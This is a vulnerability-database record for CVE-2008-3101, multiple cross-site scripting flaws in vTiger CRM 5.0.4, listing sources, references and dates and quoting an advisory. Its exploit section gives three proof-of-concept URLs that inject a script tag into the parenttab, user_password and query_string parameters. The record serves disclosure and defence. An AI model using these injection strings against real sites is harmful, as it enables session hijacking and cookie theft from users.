Details of VAR-E-200809-0436

ID

VAR-E-200809-0436

CVE

cve_id:

CVE-2008-3101

Trust: 2.7

sources: BID: 30951 // BID: 31055 // PACKETSTORM: 69548 // EXPLOIT-DB: 32307 // EDBNET: 53849

EDB ID

32307

TITLE

vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32307

DESCRIPTION

vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities. CVE-2008-3101CVE-47865 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 32307

AFFECTED PRODUCTS

vendor:	vtiger	model:	crm	scope:	eq	version:	5.0.4	Trust: 1.9
vendor:	hypersilence	model:	silentum loginsys	scope:	eq	version:	1.0	Trust: 0.3

sources: BID: 30951 // BID: 31055 // EXPLOIT-DB: 32307 // EDBNET: 53849

EXPLOIT

source: https://www.securityfocus.com/bid/30951/info

vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.

http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>

Trust: 1.0

sources: EXPLOIT-DB: 32307

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 32307

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32307

TYPE

Multiple Cross-Site Scripting Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 32307 // EDBNET: 53849

CREDITS

Fabian Fingerle

Trust: 0.6

sources: EXPLOIT-DB: 32307

EXTERNAL IDS

db:	NVD	id:	CVE-2008-3101	Trust: 3.3
db:	BID	id:	30951	Trust: 1.9
db:	EXPLOIT-DB	id:	32307	Trust: 1.6
db:	EDBNET	id:	70477	Trust: 0.6
db:	EDBNET	id:	53849	Trust: 0.6
db:	PACKETSTORM	id:	69548	Trust: 0.5
db:	BID	id:	31055	Trust: 0.3

sources: BID: 30951 // BID: 31055 // PACKETSTORM: 69548 // EXPLOIT-DB: 32307 // EDBNET: 70477 // EDBNET: 53849

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2008-3101	Trust: 2.1
url:	https://www.securityfocus.com/bid/30951/info	Trust: 1.0
url:	https://www.intelligentexploit.com	Trust: 0.6
url:	https://www.exploit-db.com/exploits/32307/	Trust: 0.6
url:	http://www.vtiger.de/vtiger-crm/downloads/patches.html?tx_abdownloads_pi1[action]=getviewdetailsfordownload&tx_abdownloads_pi1[uid]=128&tx_abdownloads_pi1[category_uid]=5&chash=e16be773a5	Trust: 0.3
url:	http://hypersilence.net/silentum_loginsys.php	Trust: 0.3

sources: BID: 30951 // BID: 31055 // PACKETSTORM: 69548 // EXPLOIT-DB: 32307 // EDBNET: 70477 // EDBNET: 53849

SOURCES

db:	BID	id:	30951
db:	BID	id:	31055
db:	PACKETSTORM	id:	69548
db:	EXPLOIT-DB	id:	32307
db:	EDBNET	id:	70477
db:	EDBNET	id:	53849

LAST UPDATE DATE

2022-07-27T09:50:41.853000+00:00

SOURCES UPDATE DATE

db:	BID	id:	30951	date:	2008-09-01T00:00:00
db:	BID	id:	31055	date:	2008-09-09T17:11:00

SOURCES RELEASE DATE

db:	BID	id:	30951	date:	2008-09-01T00:00:00
db:	BID	id:	31055	date:	2008-09-06T00:00:00
db:	PACKETSTORM	id:	69548	date:	2008-09-03T02:42:07
db:	EXPLOIT-DB	id:	32307	date:	2008-09-01T00:00:00
db:	EDBNET	id:	70477	date:	2008-09-02T00:00:00
db:	EDBNET	id:	53849	date:	2008-09-01T00:00:00

tag:	exploit	Trust: 0.5
tag:	vulnerability	Trust: 0.5
tag:	xss	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE